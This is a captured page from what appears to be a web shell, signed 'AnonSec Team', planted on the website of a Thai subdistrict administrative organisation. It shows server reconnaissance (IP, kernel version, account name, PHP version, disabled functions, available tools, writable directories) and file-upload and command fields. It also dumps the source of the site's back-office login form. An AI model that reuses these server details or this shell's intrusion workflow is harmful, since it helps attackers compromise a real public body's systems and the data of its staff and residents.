NG1NDEX
Server IP : 103.233.192.212  /  Your IP : 3.149.230.234
Web Server : Apache/2
System : Linux sv1.inde.co.th 3.10.0-1160.36.2.el7.x86_64 #1 SMP Wed Jul 21 11:57:15 UTC 2021 x86_64
User : sumpatuan ( 1058)
PHP Version : 5.5.38
Disable Function : symlink,shell_exec,exec,proc_close,proc_open,popen,system,dl,putenv,passthru,escapeshellarg,escapeshellcmd,pcntl_exec,proc_get_status,proc_nice,proc_terminate,pclose,ini_alter,virtual,openlog,ini_restore
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/sumpatuan/domains/sumpatuan.go.th/public_html/main/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/sumpatuan/domains/sumpatuan.go.th/public_html/main/topNewsbook.php
<?php
    require_once('db_main.php');
    date_default_timezone_set("Asia/Bangkok"); 
    header('Content-Type: text/html; charset=UTF-8');

?>
<!doctype html>
<html lang="en">
    <head>
        <?php  include_once ("head.html"); ?>
        <style>
            .container-login100 {
                width: 100%;  
                min-height: 100vh;
                display: -webkit-box;
                display: -webkit-flex;
                display: -moz-box;
                display: -ms-flexbox;
                display: flex;
                flex-wrap: wrap;
                justify-content: center;
                align-items: center;
                padding: 15px;
            }
            .box-login100{
              max-width:450px;
              min-height:300px;
            }
        </style>
    </head>
    <body class="animated fadeIn faster" style="background-color: #ff97ae;">
        <div class="container-login100" >
            <div class="container  pb-5 pt-4 animated fadeIn" style="margin-top:-100px;" >
                <div class="row mx-auto box-login100 p-2 ">
                    <div class="col bg-white p-4 rounded shadow-sm" >
                        <form action="action/login_newbook" method="post">
                            <div class="text-center lh-sm">
                                <img class="img-fluid mb-2" src="img/logo.png" style="max-height:150px"><br>
                                <span class="fs-2 fw-700">ระบบ Back Office</span><br>
                                <span class="fs-20">องค์การบริหารส่วนตำบลสัมปทวน</span><br>
                            </div>
                            <hr class="mt-3 mb-3" style="border-top: 1px solid #a7a7a7;">

                            <div class="text-start">
                                <span class="fs-6 fw-500"><i class="fas fa-exclamation-triangle text-warning"></i> สำหรับผู้ที่เกี่ยวข้อง</span>
                            </div>

                            <div class="input-group flex-nowrap mt-2">
                                <span class="input-group-text" ><i class="fas fa-user-alt" ></i></span>
                                <input type="text" class="form-control" placeholder="Username" name="txt_user" maxlength="20" required>
                            </div>

                            <div class="input-group flex-nowrap mt-2">
                                <span class="input-group-text" ><i class="fas fa-lock" ></i></span>
                                <input type="password" class="form-control" placeholder="Password" name="txt_pass" maxlength="20" required>
                            </div>


                            <div class="clearfix mt-3">
                                    <button type="submit" class="btn btn-dark float-start ">เข้าสู่ระบบ <i class="fas fa-chevron-circle-right" ></i></button>
                                    <a class="btn btn-outline-dark float-end" href="index" role="button">ยกเลิก</a>
                            </div>
                        </form>
                    </div>
                    <div class="w-100"></div>
                    <div class="col text-center mt-3 lh-sm text-secondary fs-11 fw-300" >
                        @2024 All right reserved, Sumpatuan Subdistrict Administrative Organization<br>design and development by Information Design Co.,Ltd.
                    </div>
                </div>
            </div>
        </div>
    </body>

</html>

Anon7 - 2022
AnonSec Team